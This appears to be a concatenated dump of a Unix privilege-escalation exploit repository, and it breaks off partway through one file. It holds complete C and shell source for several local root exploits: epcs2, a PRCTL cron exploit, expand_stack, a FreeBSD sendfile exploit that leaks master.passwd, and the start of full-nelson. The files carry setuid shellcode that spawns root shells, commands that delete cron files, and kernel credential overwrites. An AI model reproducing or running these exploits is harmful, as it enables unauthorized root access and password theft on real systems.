OUTPUT_FORMAT("elf32-i386", "elf32-i386", 48 | "elf32-i386") 49 | OUTPUT_ARCH(i386) 50 | ENTRY(_start) 51 | SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); 52 | SEARCH_DIR(/usr/i486-suse-linux/lib); 53 | 54 | MEMORY 55 | { 56 | ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000 57 | rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000 58 | } 59 | 60 | PHDRS 61 | { 62 | headers PT_PHDR PHDRS ; 63 | text PT_LOAD FILEHDR PHDRS ; 64 | fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ; 65 | } 66 | 67 | SECTIONS 68 | { 69 | 70 | .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme 71 | 72 | . = 0xbfff0000 + SIZEOF_HEADERS; 73 | .text : { *(.text) } >ram :text 74 | .data : { *(.data) } >ram :text 75 | .bss : 76 | { 77 | *(.dynbss) 78 | *(.bss) 79 | *(.bss.*) 80 | *(.gnu.linkonce.b.*) 81 | *(COMMON) 82 | . = ALIGN(32 / 8); 83 | } >ram :text 84 | 85 | } -------------------------------------------------------------------------------- /elflbl.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/elflbl.zip -------------------------------------------------------------------------------- /enlightenment.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/enlightenment.tgz -------------------------------------------------------------------------------- /epcs2.c: -------------------------------------------------------------------------------- 1 | /* 2 | * epcs2 (improved by lst [liquid@dqc.org]) 3 | * ~~~~~~~ 4 | * exploit for execve/ptrace race condition in Linux kernel up to 2.2.18 5 | * 6 | * originally by: 7 | * (c) 2001 Wojciech Purczynski / cliph / 8 | * 9 | * improved by: 10 | * lst [liquid@dqc.org] 11 | * 12 | * This sploit does _not_ use brute force. It does not need that. 13 | * It does only one attemt to sploit the race condition in execve. 14 | * Parent process waits for a context-switch that occur after 15 | * child task sleep in execve. 16 | * 17 | * It should work even on openwall-patched kernels (I haven't tested it). 18 | * 19 | * Compile it: 20 | * cc epcs.c -o epcs 21 | * Usage: 22 | * ./epcs [victim] 23 | * 24 | * It gives instant root shell with any of a suid binaries. 25 | * 26 | * If it does not work, try use some methods to ensure that execve 27 | * would sleep while loading binary file into memory, 28 | * 29 | * i.e.: cat /usr/lib/* >/dev/null 2>&1 30 | * 31 | * Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4 32 | * This exploit does not work on 2.4.x because kernel won't set suid 33 | * privileges if user ptraces a binary. 34 | * But it is still exploitable on these kernels. 35 | * 36 | * Thanks to Bulba (he made me to take a look at this bug ;) ) 37 | * Greetings to SigSegv team. 38 | * 39 | * -- d00t 40 | * improved by lst [liquid@dqc.org] 41 | * props to kevin for most of the work 42 | * 43 | * now works on stack non-exec systems with some neat trickery for the automated 44 | * method, ie. no need to find the bss segment via objdump 45 | * 46 | * particularly it now rewrites the code instruction sets in the 47 | * dynamic linker _start segment and continues execution from there. 48 | * 49 | * an aside, due to the fact that the code self-modified, it wouldnt work 50 | * quite correctly on a stack non-exec system without playing directly with 51 | * the bss segment (ie no regs.eip = regs.esp change). this is much more 52 | * automated. however, do note that the previous version did not trigger stack 53 | * non-exec warnings due to how it was operating. note that the regs.eip = regs.esp 54 | * method will break on stack non-exec systems. 55 | * 56 | * as always.. enjoy. 57 | * 58 | */ 59 | 60 | #include 61 | #include 62 | #include 63 | #include 64 | #include 65 | #include 66 | #include 67 | #include 68 | #include 69 | 70 | #define CS_SIGNAL SIGUSR1 71 | #define VICTIM "/usr/bin/passwd" 72 | #define SHELL "/bin/sh" 73 | 74 | /* 75 | * modified simple shell code with some trickery (hand tweaks) 76 | */ 77 | char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */ 78 | "\x31\xc0\xb0\x2e\xcd\x80" "\x31\xc0\x50\xeb\x17\x8b\x1c\x24" /* execve(SHELL) */ 79 | "\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */ 80 | "\x04\xb0\x0b\xcd\x80\x31\xc0\x89" "\xc3\x40\xcd\x80\xe8\xe4\xff\xff" "\xff" SHELL "\x00\x00\x00"; /* pad me */ 81 | 82 | volatile int cs_detector = 0; 83 | 84 | void 85 | cs_sig_handler (int sig) 86 | { 87 | cs_detector = 1; 88 | } 89 | 90 | void 91 | do_victim (char *filename) 92 | { 93 | while (!cs_detector); 94 | kill (getppid (), CS_SIGNAL); 95 | execl (filename, filename, NULL); 96 | perror ("execl"); 97 | exit (-1); 98 | } 99 | 100 | int 101 | check_execve (pid_t victim, char *filename) 102 | { 103 | char path[PATH_MAX + 1]; 104 | char link[PATH_MAX + 1]; 105 | int res; 106 | 107 | snprintf (path, sizeof (path), "/proc/%i/exe", (int) victim); 108 | if (readlink (path, link, sizeof (link) - 1) < 0) 109 | { 110 | perror ("readlink"); 111 | return -1; 112 | } 113 | 114 | link[sizeof (link) - 1] = '\0'; 115 | res = !strcmp (link, filename); 116 | if (res) 117 | fprintf (stderr, "child slept outside of execve\n"); 118 | return res; 119 | } 120 | 121 | int 122 | main (int argc, char *argv[]) 123 | { 124 | char *filename = VICTIM; 125 | pid_t victim; 126 | int error, i; 127 | struct user_regs_struct regs; 128 | 129 | /* take our command args if you wanna play with other progs */ 130 | if (argc > 1) 131 | filename = argv[1]; 132 | 133 | signal (CS_SIGNAL, cs_sig_handler); 134 | 135 | victim = fork (); 136 | if (victim < 0) 137 | { 138 | perror ("fork: victim"); 139 | exit (-1); 140 | } 141 | if (victim == 0) 142 | do_victim (filename); 143 | 144 | kill (victim, CS_SIGNAL); 145 | while (!cs_detector); 146 | 147 | if (ptrace (PTRACE_ATTACH, victim)) 148 | { 149 | perror ("ptrace: PTRACE_ATTACH"); 150 | goto exit; 151 | } 152 | 153 | if (check_execve (victim, filename)) 154 | goto exit; 155 | 156 | (void) waitpid (victim, NULL, WUNTRACED); 157 | if (ptrace (PTRACE_CONT, victim, 0, 0)) 158 | { 159 | perror ("ptrace: PTRACE_CONT"); 160 | goto exit; 161 | } 162 | 163 | (void) waitpid (victim, NULL, WUNTRACED); 164 | 165 | if (ptrace (PTRACE_GETREGS, victim, 0, ®s)) 166 | { 167 | perror ("ptrace: PTRACE_GETREGS"); 168 | goto exit; 169 | } 170 | 171 | /* make sure that last null is in there */ 172 | for (i = 0; i <= strlen (shellcode); i += 4) 173 | { 174 | if (ptrace (PTRACE_POKETEXT, victim, regs.eip + i, 175 | *(int *) (shellcode + i))) 176 | { 177 | perror ("ptrace: PTRACE_POKETEXT"); 178 | goto exit; 179 | } 180 | } 181 | 182 | if (ptrace (PTRACE_SETREGS, victim, 0, ®s)) 183 | { 184 | perror ("ptrace: PTRACE_SETREGS"); 185 | goto exit; 186 | } 187 | 188 | fprintf (stderr, "bug exploited successfully.\nenjoy!\n"); 189 | 190 | if (ptrace (PTRACE_DETACH, victim, 0, 0)) 191 | { 192 | perror ("ptrace: PTRACE_DETACH"); 193 | goto exit; 194 | } 195 | 196 | (void) waitpid (victim, NULL, 0); 197 | return 0; 198 | 199 | exit: 200 | fprintf (stderr, "d0h! error!\n"); 201 | kill (victim, SIGKILL); 202 | return -1; 203 | } 204 | 205 | -------------------------------------------------------------------------------- /exp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # PRCTL local root exp By: Sunix 4 | # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp 5 | # tested on Intel(R) Xeon(TM) CPU 3.20GHz 6 | # kernel 2.6.9-22.ELsmp 7 | # maybe others ... 8 | # Tx to drayer & RoMaNSoFt for their clear code... 9 | # 10 | # zmia23@yahoo.com 11 | 12 | 13 | cat > /tmp/getsuid.c << __EOF__ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; 24 | 25 | int main() { 26 | int child; 27 | struct rlimit corelimit; 28 | corelimit.rlim_cur = RLIM_INFINITY; 29 | corelimit.rlim_max = RLIM_INFINITY; 30 | setrlimit(RLIMIT_CORE, &corelimit); 31 | if ( !( child = fork() )) { 32 | chdir("/etc/cron.d"); 33 | prctl(PR_SET_DUMPABLE, 2); 34 | sleep(200); 35 | exit(1); 36 | } 37 | kill(child, SIGSEGV); 38 | sleep(120); 39 | } 40 | __EOF__ 41 | 42 | cat > /tmp/s.c << __EOF__ 43 | #include 44 | main(void) 45 | { 46 | setgid(0); 47 | setuid(0); 48 | system("/bin/sh"); 49 | system("rm -rf /tmp/s"); 50 | system("rm -rf /etc/cron.d/*"); 51 | return 0; 52 | } 53 | __EOF__ 54 | echo "wait aprox 4 min to get sh" 55 | cd /tmp 56 | cc -o s s.c 57 | cc -o getsuid getsuid.c 58 | ./getsuid 59 | ./s 60 | rm -rf getsuid* 61 | rm -rf s.c 62 | rm -rf prctl.sh 63 | 64 | # milw0rm.com [2006-07-14] 65 | -------------------------------------------------------------------------------- /expand_stack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * expand_stack SMP race local root exploit 3 | * 4 | * Copyright (C) 2005 Christophe Devine and Julien Tinnes 5 | * 6 | * This program is quite unreliable - you may have to run it 7 | * several times before getting a rootshell. It was only tested 8 | * so far on a bi-xeon running Debian testing / Linux 2.4.29-rc1. 9 | * 10 | * Vulnerability discovered by Paul Starzetz 11 | * http://www.isec.pl/vulnerabilities/isec-0022-pagefault.txt 12 | * 13 | * This program is free software; you can redistribute it and/or modify 14 | * it under the terms of the GNU General Public License as published by 15 | * the Free Software Foundation; either version 2 of the License, or 16 | * (at your option) any later version. 17 | * 18 | * This program is distributed in the hope that it will be useful, 19 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 20 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 21 | * GNU General Public License for more details. 22 | * 23 | * You should have received a copy of the GNU General Public License 24 | * along with this program; if not, write to the Free Software 25 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 26 | */ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | #include 37 | #include 38 | #include 39 | #include 40 | 41 | #define PGD_SIZE (PAGE_SIZE * 1024) 42 | #define TARGET_BASE (void *) (PGD1_BASE + PAGE_SIZE) 43 | #define MMAP_BASE (void *) (PGD1_BASE + PAGE_SIZE * 3) 44 | #define PGD1_BASE (void *) 0x50000000 45 | #define PGD2_BASE (void *) 0x60000000 46 | #define MAGIC_TEST 0x18A041DF 47 | #define SUID "/bin/ping" 48 | 49 | unsigned char stack1[4096]; 50 | unsigned char stack2[4096]; 51 | unsigned char stack3[4096]; 52 | 53 | char exec_sh[] = /* bob */ 54 | 55 | /* setreuid(0,0); */ 56 | "\x31\xc0" /* xor %eax, %eax */ 57 | "\x31\xc3" /* xor %ebx, %ebx */ 58 | "\x31\xc1" /* xor %ecx, %ecx */ 59 | "\xb0\x46" /* mov $0x46, %al */ 60 | "\xcd\x80" /* int $0x80 */ 61 | 62 | /* execve() of /bin/sh */ 63 | "\x31\xc0" /* xor %eax, %eax */ 64 | "\x50" /* push %eax */ 65 | "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ 66 | "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ 67 | "\x89\xe3" /* mov %esp, %ebx */ 68 | "\x50" /* push %eax */ 69 | "\x89\xe2" /* mov %esp, %edx */ 70 | "\x53" /* push %ebx */ 71 | "\x89\xe1" /* mov %esp, %ecx */ 72 | "\xb0\x0b" /* mov $0x0b, %al */ 73 | "\xcd\x80"; /* int $0x80 */ 74 | 75 | int pid[3], sff; 76 | long long tsc1, tsc2; 77 | 78 | void child_sighandler( int signum ) 79 | { 80 | int *xs1, i, j; 81 | 82 | if( signum == SIGUSR1 ) 83 | { 84 | for( i = 0; i > sff; i-- ) j = i * i; 85 | 86 | asm volatile( "rdtsc" : "=A" (tsc1) ); 87 | xs1 = TARGET_BASE; *xs1 = MAGIC_TEST; 88 | signal( SIGUSR1, child_sighandler ); 89 | } 90 | 91 | if( signum == SIGALRM ) 92 | { 93 | printf( " [-] unable to exploit race in 30s,\n" 94 | " kernel patched or load too high.\n" ); 95 | exit( 2 ); 96 | } 97 | } 98 | 99 | int child1_thread( void *arg ) 100 | { 101 | printf( " [+] in thread 1 (pid = %d)\n", getpid() ); 102 | signal( SIGUSR1, child_sighandler ); 103 | while( 1 ) sleep( 4 ); 104 | return( 0 ); 105 | } 106 | 107 | int test_race_result( void ) 108 | { 109 | FILE *f; 110 | int *mtest; 111 | char line[128]; 112 | 113 | unsigned int vma_start_prev; 114 | unsigned int vma_start; 115 | unsigned int vma_end; 116 | 117 | if( ( f = fopen( "/proc/self/maps", "r" ) ) == NULL ) 118 | { 119 | perror( " [-] fopen /proc/self/maps" ); 120 | exit( 1 ); 121 | } 122 | 123 | mtest = TARGET_BASE; 124 | 125 | vma_start_prev = 0; 126 | 127 | while( fgets( line, sizeof( line ) - 1, f ) != NULL ) 128 | { 129 | sscanf( line, "%08x-%08x", &vma_start, &vma_end ); 130 | 131 | if( vma_start == (int) MMAP_BASE - PAGE_SIZE && 132 | vma_end == (int) MMAP_BASE + PAGE_SIZE && 133 | vma_start_prev != (int) TARGET_BASE && 134 | *mtest == MAGIC_TEST ) 135 | return( 0 ); 136 | 137 | vma_start_prev = vma_start; 138 | } 139 | 140 | fclose( f ); 141 | 142 | return( 1 ); 143 | } 144 | 145 | int child2_thread( void *arg ) 146 | { 147 | long delta[8]; 148 | int *xs2, i, j, fct; 149 | 150 | usleep( 50000 ); 151 | printf( " [+] in thread 2 (pid = %d)\n", getpid() ); 152 | 153 | signal( SIGALRM, child_sighandler ); 154 | alarm( 30 ); 155 | 156 | asm volatile( "rdtsc" : "=A" (tsc1) ); 157 | for( i = 0; i < 4096; i++ ) j = i * i; 158 | asm volatile( "rdtsc" : "=A" (tsc2) ); 159 | fct = tsc2 - tsc1; 160 | 161 | printf( " [+] rdtsc calibration: %d\n", fct ); 162 | 163 | for( i = 0; i < 8; i++ ) 164 | delta[i] = 0; 165 | 166 | tsc1 = tsc2 = 0; 167 | 168 | printf( " [+] exploiting race, wait...\n" ); 169 | 170 | while( 1 ) 171 | { 172 | if( mmap( MMAP_BASE, 0x1000, PROT_READ | PROT_WRITE, 173 | MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE | 174 | MAP_GROWSDOWN, 0, 0 ) == (void *) -1 ) 175 | { 176 | perror( " [-] mmap target" ); 177 | return( 1 ); 178 | } 179 | 180 | j = 0; 181 | for( i = 0; i < 8; i++ ) 182 | j += delta[i]; 183 | j /= 8; 184 | 185 | sff += ( 128 * j ) / fct; 186 | 187 | if( sff < -16384 || sff > 16384 ) 188 | sff = 0; 189 | 190 | for( i = 7; i > 0; i-- ) 191 | delta[i] = delta[i - 1]; 192 | 193 | delta[0] = tsc1 - tsc2; 194 | 195 | kill( pid[0], SIGUSR1 ); 196 | 197 | for( i = 0; i < sff; i++ ) j = i * i; 198 | 199 | asm volatile( "rdtsc" : "=A" (tsc2) ); 200 | xs2 = MMAP_BASE - PAGE_SIZE; *xs2 = 0; 201 | 202 | if( test_race_result() == 0 ) 203 | { 204 | usleep( 10000 ); 205 | 206 | if( test_race_result() == 0 ) 207 | break; 208 | } 209 | 210 | munmap( TARGET_BASE, PAGE_SIZE * 3 ); 211 | } 212 | 213 | printf( " [+] race won (shift: %d)\n", sff ); 214 | 215 | return( 0 ); 216 | } 217 | 218 | int child3_thread( void *arg ) 219 | { 220 | char *argv[2], *envp[1]; 221 | 222 | argv[0] = (char *) arg; 223 | argv[1] = NULL; 224 | envp[0] = NULL; 225 | 226 | execve( (char *) arg, argv, envp ); 227 | 228 | exit( 0 ); 229 | } 230 | 231 | int main( void ) 232 | { 233 | int nb_cpu, s, n; 234 | char line[1024]; 235 | FILE *f; 236 | void *x; 237 | 238 | if( ( f = fopen( "/proc/cpuinfo", "r" ) ) == NULL ) 239 | { 240 | perror( " [-] fopen /proc/cpuinfo" ); 241 | return( 1 ); 242 | } 243 | 244 | nb_cpu = 0; 245 | 246 | while( fgets( line, sizeof( line ) - 1, f ) != NULL ) 247 | if( memcmp( line, "processor", 9 ) == 0 ) 248 | nb_cpu++; 249 | 250 | fclose( f ); 251 | 252 | if( nb_cpu <= 1 ) 253 | { 254 | fprintf( stderr, "This program only works on SMP systems.\n" ); 255 | return( 1 ); 256 | } 257 | 258 | printf( "\n" ); 259 | 260 | if( mmap( PGD1_BASE, PAGE_SIZE, PROT_READ, MAP_FIXED | 261 | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 ) == (void *) -1 ) 262 | { 263 | perror( "mmap pgd1 base\n" ); 264 | return( 1 ); 265 | } 266 | 267 | n = *((int *) PGD1_BASE ); 268 | 269 | if( mmap( PGD2_BASE, PAGE_SIZE, PROT_READ, MAP_FIXED | 270 | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 ) == (void *) -1 ) 271 | { 272 | perror( "mmap pgd2 base\n" ); 273 | return( 1 ); 274 | } 275 | 276 | n = *((int *) PGD2_BASE ); 277 | 278 | if( ( pid[0] = clone( child1_thread, stack1 + PAGE_SIZE, 279 | SIGCHLD | CLONE_VM, 0 ) ) == -1 ) 280 | { 281 | perror( " [-] clone child1" ); 282 | return( 1 ); 283 | } 284 | 285 | if( ( pid[1] = clone( child2_thread, stack2 + PAGE_SIZE, 286 | SIGCHLD | CLONE_VM, 0 ) ) == -1 ) 287 | { 288 | perror( " [-] clone child2" ); 289 | kill( pid[0], SIGKILL ); 290 | return( 1 ); 291 | } 292 | 293 | waitpid( pid[1], &s, 0 ); 294 | kill( pid[0], SIGKILL ); 295 | 296 | if( WEXITSTATUS(s) != 0 ) 297 | return( 1 ); 298 | 299 | x = (void *) ( TARGET_BASE ); 300 | memset( (void *) x, 0x90, PAGE_SIZE ); 301 | n = 16 + ( sizeof( exec_sh ) & 0xFFF0 ); 302 | memcpy( x + PAGE_SIZE - n, exec_sh, n ); 303 | 304 | munmap( PGD1_BASE, PGD_SIZE ); 305 | munmap( PGD2_BASE, PGD_SIZE ); 306 | 307 | for( n = 0; n < 256; n++ ) 308 | { 309 | if( ( pid[0] = clone( child3_thread, stack1 + PAGE_SIZE, 310 | SIGCHLD | CLONE_VM, SUID ) ) == -1 ) 311 | { 312 | perror( " [-] clone child3" ); 313 | return( 1 ); 314 | } 315 | 316 | if( ( pid[1] = clone( child3_thread, stack2 + PAGE_SIZE, 317 | SIGCHLD | CLONE_VM, SUID ) ) == -1 ) 318 | { 319 | perror( " [-] clone child3" ); 320 | return( 1 ); 321 | } 322 | 323 | waitpid( pid[0], &s, 0 ); 324 | if( WEXITSTATUS(s) != 2 ) break; 325 | 326 | waitpid( pid[1], &s, 0 ); 327 | if( WEXITSTATUS(s) != 2 ) break; 328 | } 329 | 330 | return( 0 ); 331 | } -------------------------------------------------------------------------------- /exploit.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** FreeBSD master.passwd disclosure exploit 3 | ** by kcope in 2005, kingcope[at]gmx.net 4 | ** thanks to revoguard 5 | ** just compile and execute .. look into the kmem file 6 | ** it contains the master.passwd 7 | ** tested on unpatched FreeBSD 4.11-RELEASE 8 | ** advisory: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:02.sendfile.asc 9 | ** +++KEEP PRIV8+++ 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #define BUF_SIZ 4096 21 | 22 | void dolisten() { 23 | int s,c; 24 | struct sockaddr_in addr; 25 | struct sockaddr_in cli; 26 | socklen_t cli_size; 27 | char buf[BUF_SIZ]; 28 | FILE *f=fopen("kmem", "w"); 29 | 30 | addr.sin_addr.s_addr = INADDR_ANY; 31 | addr.sin_port = htons(31337); 32 | addr.sin_family = AF_INET; 33 | 34 | s = socket(PF_INET, SOCK_STREAM, 0); 35 | if (bind(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 36 | { 37 | perror("bind() failed"); 38 | exit(1); 39 | } 40 | 41 | listen(s, 3); 42 | 43 | c = accept(s, (struct sockaddr*) &cli, &cli_size); 44 | 45 | while (recv(c, buf, sizeof(buf) - 1, 0) > 0) { 46 | fwrite(buf, sizeof(buf), 1, f); 47 | } 48 | 49 | } 50 | 51 | int main() { 52 | int input_fd,fd,s,k; 53 | struct stat file_info; 54 | off_t offset = 0; 55 | FILE *f; 56 | int i=0; 57 | struct sockaddr_in addr; 58 | char st[]="A"; 59 | 60 | f=fopen("sendfile1", "w"); 61 | for (i=0; i!=64000000; i++) { 62 | fwrite(st, 1, 1, f); 63 | } 64 | fclose(f); 65 | 66 | input_fd = open ("sendfile1", O_RDWR); 67 | fstat (input_fd, &file_info); 68 | 69 | if (fork() != 0) { 70 | sleep(2); 71 | s = socket(PF_INET, SOCK_STREAM, 0); 72 | 73 | addr.sin_addr.s_addr = INADDR_ANY; 74 | addr.sin_port = htons(31337); 75 | addr.sin_family = AF_INET; 76 | 77 | if (connect(s, (struct sockaddr*) &addr, sizeof(addr)) == -1) 78 | { 79 | perror("connect() failed"); 80 | return 2; 81 | } 82 | 83 | if (fork() != 0) { 84 | if (sendfile (input_fd, s, offset, 64000000, NULL, NULL, 0) == -1) { 85 | perror("sendfile()"); 86 | return -1; 87 | } 88 | } else { 89 | f=fopen("sendfile1", "w"); 90 | fclose(f); 91 | for (k=0;k!=10;k++) 92 | system("/usr/bin/chsh -s /bin/sh"); 93 | wait(); 94 | } 95 | } else { 96 | dolisten(); 97 | wait(); 98 | } 99 | return 0; 100 | } 101 | 102 | // milw0rm.com [2005-11-09] 103 | 104 | -------------------------------------------------------------------------------- /exploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/exploit.zip -------------------------------------------------------------------------------- /freedbs5.3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/freedbs5.3.zip -------------------------------------------------------------------------------- /full-nelson.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux Kernel <= 2.6.37 local privilege escalation 3 | * by Dan Rosenberg 4 | * @djrbliss on twitter 5 | * 6 | * Usage: 7 | * gcc full-nelson.c -o full-nelson 8 | * ./full-nelson 9 | * 10 | * This exploit leverages three vulnerabilities to get root, all of which were 11 | * discovered by Nelson Elhage: 12 | * 13 | * CVE-2010-4258 14 | * ------------- 15 | * This is the interesting one, and the reason I wrote this exploit. If a 16 | * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL 17 | * word will be written to a user-specified pointer when that thread exits. 18 | * This write is done using put_user(), which ensures the provided destination 19 | * resides in valid userspace by invoking access_ok(). However, Nelson 20 | * discovered that when the kernel performs an address limit override via 21 | * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, 22 | * etc.), this override is not reverted before calling put_user() in the exit 23 | * path, allowing a user to write a NULL word to an arbitrary kernel address. 24 | * Note that this issue requires an additional vulnerability to trigger. 25 | * 26 | * CVE-2010-3849 27 | * ------------- 28 | * This is a NULL pointer dereference in the Econet protocol. By itself, it's 29 | * fairly benign as a local denial-of-service. It's a perfect candidate to 30 | * trigger the above issue, since it's reachable via sock_no_sendpage(), which 31 | * subsequently calls sendmsg under KERNEL_DS. 32 | * 33 | * CVE-2010-3850 34 | * ------------- 35 | * I wouldn't be able to reach the NULL pointer dereference and trigger the 36 | * OOPS if users weren't able to assign Econet addresses to arbitrary 37 | * interfaces due to a missing capabilities check. 38 | * 39 | * In the interest of public safety, this exploit was specifically designed to 40 | * be limited: 41 | * 42 | * * The particular symbols I resolve are not exported on Slackware or Debian 43 | * * Red Hat does not support Econet by default 44 | * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and 45 | * Debian 46 | * 47 | * However, the important issue, CVE-2010-4258, affects everyone, and it would 48 | * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly 49 | * more sophisticated version of this that doesn't have the roadblocks I put in 50 | * to prevent abuse by script kiddies. 51 | * 52 | * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. 53 | * 54 | * NOTE: the exploit process will deadlock and stay in a zombie state after you 55 | * exit your root shell because the Econet thread OOPSes while holding the 56 | * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother. 57 | * 58 | * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla 59 | */ 60 | 61 | #include 62 | #include 63 | #include 64 | #include 65 | #include 66 | #include 67 | #include 68 | #include 69 | #include 70 | #include 71 | #include 72 | #include 73 | 74 | /* How many bytes should we clear in our 75 | * function pointer to put it into userspace? */ 76 | #ifdef __x86_64__ 77 | #define SHIFT 24 78 | #define OFFSET 3 79 | #else 80 | #define SHIFT 8 81 | #define OFFSET 1 82 | #endif 83 | 84 | /* thanks spender... */ 85 | unsigned long get_kernel_sym(char *name) 86 | { 87 | FILE *f; 88 | unsigned long addr; 89 | char dummy; 90 | char sname[512]; 91 | struct utsname ver; 92 | int ret; 93 | int rep = 0; 94 | int oldstyle = 0; 95 | 96 | f = fopen("/proc/kallsyms", "r"); 97 | if (f == NULL) { 98 | f = fopen("/proc/ksyms", "r"); 99 | if (f == NULL) 100 | goto fallback; 101 | oldstyle = 1; 102 | } 103 | 104 | repeat: 105 | ret = 0; 106 | while(ret != EOF) { 107 | if (!oldstyle) 108 | ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); 109 | else { 110 | ret = fscanf(f, "%p %s\n", (void **)&addr, sname); 111 | if (ret == 2) { 112 | char *p; 113 | if (strstr(sname, "_O/") || strstr(sname, "_S.")) 114 | continue; 115 | p = strrchr(sname, '_'); 116 | if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { 117 | p = p - 4; 118 | while (p > (char *)sname && *(p - 1) == '_') 119 | p--; 120 | *p = '\0'; 121 | } 122 | } 123 | } 124 | if (ret == 0) { 125 | fscanf(f, "%s\n", sname); 126 | continue; 127 | } 128 | if (!strcmp(name, sname)) { 129 | fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : 130 | ""); 131 | fclose(f); 132 | return addr; 133 | } 134 | } 135 | 136 | fclose(f); 137 | if (rep) 138 | return 0; 139 | fallback: 140 | uname(&ver); 141 | if (strncmp(ver.release, "2.6", 3)) 142 | oldstyle = 1; 143 | sprintf(sname, "/boot/System.map-%s", ver.release); 144 | f = fopen(sname, "r"); 145 | if (f == NULL) 146 | return 0; 147 | rep = 1; 148 | goto repeat; 149 | } 150 | 151 | typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 152 | typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 153 | _commit_creds commit_creds; 154 | _prepare_kernel_cred prepare_kernel_cred; 155 | 156 | static int __attribute__((regparm(3))) 157 | getroot(void * file, void * vma) 158 | { 159 | 160 | commit_creds(prepare_kernel_cred(0)); 161 | return -1; 162 | 163 | } 164 | 165 | /* Why do I do this? Because on x86-64, the address of 166 | * commit_creds and prepare_kernel_cred are loaded relative 167 | * to rip, which means I can't just copy the above payload 168 | * into my landing area. */ 169 | void __attribute__((regparm(3))) 170 | trampoline() 171 | { 172 | 173 | #ifdef __x86_64__ 174 | asm("mov $getroot, %rax; call *%rax;"); 175 | #else 176 | asm("mov $getroot, %eax; call *%eax;"); 177 | #endif 178 | 179 | } 180 | 181 | /* Triggers a NULL pointer dereference in econet_sendmsg 182 | * via sock_no_sendpage, so it's under KERNEL_DS */ 183 | int trigger(int * fildes) 184 | { 185 | int ret; 186 | struct ifreq ifr; 187 | 188 | memset(&ifr, 0, sizeof(ifr)); 189 | strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); 190 | 191 | ret = ioctl(fildes[2], SIOCSIFADDR, &ifr); 192 | 193 | if(ret < 0) { 194 | printf("[*] Failed to set Econet address.\n"); 195 | return -1; 196 | } 197 | 198 | splice(fildes[3], NULL, fildes[1], NULL, 128, 0); 199 | splice(fildes[0], NULL, fildes[2], NULL, 128, 0); 200 | 201 | /* Shouldn't get here... */ 202 | exit(0); 203 | } 204 | 205 | int main(int argc, char * argv[]) 206 | { 207 | unsigned long econet_ops, econet_ioctl, target, landing; 208 | int fildes[4], pid; 209 | void * newstack, * payload; 210 | 211 | /* Create file descriptors now so there are two 212 | references to them after cloning...otherwise 213 | the child will never return because it 214 | deadlocks when trying to unlock various 215 | mutexes after OOPSing */ 216 | pipe(fildes); 217 | fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); 218 | fildes[3] = open("/dev/zero", O_RDONLY); 219 | 220 | if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) { 221 | printf("[*] Failed to open file descriptors.\n"); 222 | return -1; 223 | } 224 | 225 | /* Resolve addresses of relevant symbols */ 226 | printf("[*] Resolving kernel addresses...\n"); 227 | econet_ioctl = get_kernel_sym("econet_ioctl"); 228 | econet_ops 